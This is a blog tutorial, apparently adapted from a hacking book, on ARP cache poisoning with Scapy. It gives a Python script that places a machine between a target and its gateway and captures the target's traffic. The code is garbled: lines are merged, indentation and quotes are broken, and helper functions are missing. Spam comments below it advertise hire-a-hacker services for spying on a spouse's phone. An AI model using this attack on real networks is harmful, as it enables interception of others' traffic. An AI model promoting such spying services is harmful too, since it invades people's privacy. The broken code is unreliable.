How to perform ARP Cache Poisoning with Scapy





How to perform ARP Cache Poisoning with Scapy

 



ARP poisoning is one of the oldest yet most effective tricks in a hacker’s toolkit. Quite simply, we will convince a target machine that we have become its gateway, and we will also convince the gateway that in order to reach the target machine, all traffic has to go through us. Every computer on a network maintains an ARP cache that stores the most recent MAC addresses that match to IP addresses on the local network, and we are going to poison this cache with entries that we control to achieve this attack. Because the Address Resolution Protocol and ARP poisoning in general is covered in numerous other materials, I’ll leave it to you to do any necessary research to understand how this attack works at a lower level. Now that we know what we need to do, let’s put it into practice. When I tested this, I attacked a real Windows machine and used my Kali VM as my attacking machine. I have also tested this code against various mobile devices connected to a wireless access point and it worked great. The first thing we’ll do is check the ARP cache on the target Windows machine so we can see our attack in action later on. Examine the following to see how to inspect the ARP cache on your Windows VM.

C:\Users\Clare> ipconfig

Windows IP Configuration

Wireless LAN adapter

Wireless Network Connection:

Connection-specific DNS Suffix  . : gateway.pace.com

Link-local IPv6 Address . . . . . : fe80::34a0:48cd:579:a3d9%11

IPv4 Address. . . . . . . . . . . : 172.16.1.71

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 172.16.1.254

C:\Users\Clare> arp -a

Interface: 172.16.1.71 — 0xb

Internet Address      Physical Address         Type

172.16.1.254          3c-ea-4f-2b-41-f9        dynamic

172.16.1.255          ff-ff-ff-ff-ff-ff        static

224.0.0.22            01-00-5e-00-00-16        static

224.0.0.251           01-00-5e-00-00-fb        static

224.0.0.252           01-00-5e-00-00-fc        static

255.255.255.255       ff-ff-ff-ff-ff-ff        static

So now we can see that the gateway IP address  is at 172.16.1.254 and its associated ARP cache entry  has a MAC address of 3c-ea-4f-2b-41-f9. We will take note of this because we can view the ARP cache while the attack is ongoing and see that we have changed the gateway’s registered MAC address. Now that we know the gateway and our target IP address, let’s begin coding our ARP poisoning script. Open a new Python file, call it arper.py, and enter the following code:
Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you.
from scapy.all import *

import os

import sys

import threading

import signal

interface = "en1"

target_ip = "172.16.1.71"

gateway_ip = "172.16.1.254"

packet_count = 1000

# set our interface conf.iface = interface
# turn off output

conf.verb = 0

print "[*] Setting up %s" % interface

gateway_mac = get_mac(gateway_ip)

if gateway_mac is None:

print "[!!!] Failed to get gateway MAC. Exiting."

sys.exit(0)

else:

print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)

target_mac = get_mac(target_ip)

if target_mac is None:

print "[!!!] Failed to get target MAC. Exiting."

sys.exit(0)

else:

print  "[*] Target %s is at %s" % (target_ip,target_mac)

# start poison thread

poison_thread = threading.Thread(target = poison_target, args = (gateway_ip, gateway_mac,target_ip,target_mac)) poison_thread.start()

try:

print "[*] Starting sniffer for %d packets" % packet_count

bpf_filter = "ip host %s" % target_ip

packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)

# write out the captured packets

wrpcap('arper.pcap',packets)

# restore the network                        restore_target(gateway_ip,gateway_mac,target_ip,target_mac)

except KeyboardInterrupt:

# restore the network     restore_target(gateway_ip,gateway_mac,target_ip,target_mac)

sys.exit(0)


This is the main setup portion of our attack. We start by resolving the gateway  and target IP  address’s corresponding MAC addresses using a function called get_mac that we’ll plumb in shortly. After we have accomplished that, we spin up a second thread to begin the actual ARP poisoning attack . In our main thread, we start up a sniffer  that will capture a preset amount of packets using a BPF filter to only capture traffic for our target IP address. When all of the packets have been captured, we write them out  to a PCAP file so that we can open them in Wireshark or use our upcoming image carving script against them. When the attack is finished, we call our restore_target function , which is responsible for putting the network back to the way it was before the ARP poisoning took place. Let’s add the supporting functions now by punching in the following code above our previous code block: def restore_target(gateway_ip,gateway_mac,target_ip,target_mac): # slightly different method using send print “[*] Restoring target…” ➊ send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst=”ff:ff:ff:ff:ff:ff”,hwsrc=gateway_mac),count=5) send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst=”ff:ff:ff:ff:ff:ff”,hwsrc=target_mac),count=5) # signals the main thread to exit

Post a Comment

3 Comments

  1. My husband was so smooth at hiding his infidelity so I had no proof for months, I was referred to some hacker and decided to give him a try.. the result was incredible because all my cheating husband's text messages, whatsapp, facebook and even phone conversations was wired directly to my cellphone. CYBERHACKPROS@GMAIL.COM helped me put a round-the-clock monitoring on him and I got concrete evidence and he showed me proof..if your spouse is an expert at hiding his cheating adventures contact him via email/phone CYBERHACKPROS@GMAIL.COM or +1 512 605 1256 Tell him i reffered you.He will help you INSTAGRAM:Cyberhackprofessionals

    ReplyDelete
  2. i was lost with no hope for my wife was cheating and had always got away with it because i did not know how or

    always too scared to pin anything on her. with the help a friend who recommended me to who help hack her phone,

    email, chat, sms and expose her for a cheater she is. I just want to say a big thank you to

    SUPERIOR.HACK@GMAIL.COM . am sure someone out there is looking for how to solve his relationship problems, you can also contact him for all sorts of hacking job..he is fast and reliable. you could also text +1 213-295-1376(whatsapp) contact and thank me later

    ReplyDelete
  3. How To Perform Arp Cache Poisoning With Scapy >>>>> Download Now

    >>>>> Download Full

    How To Perform Arp Cache Poisoning With Scapy >>>>> Download LINK

    >>>>> Download Now

    How To Perform Arp Cache Poisoning With Scapy >>>>> Download Full

    >>>>> Download LINK eP

    ReplyDelete
Emoji
(y)
:)
:(
hihi
:-)
:D
=D
:-d
;(
;-(
@-)
:P
:o
:>)
(o)
:p
(p)
:-s
(m)
8-)
:-t
:-b
b-(
:-#
=p~
x-)
(k)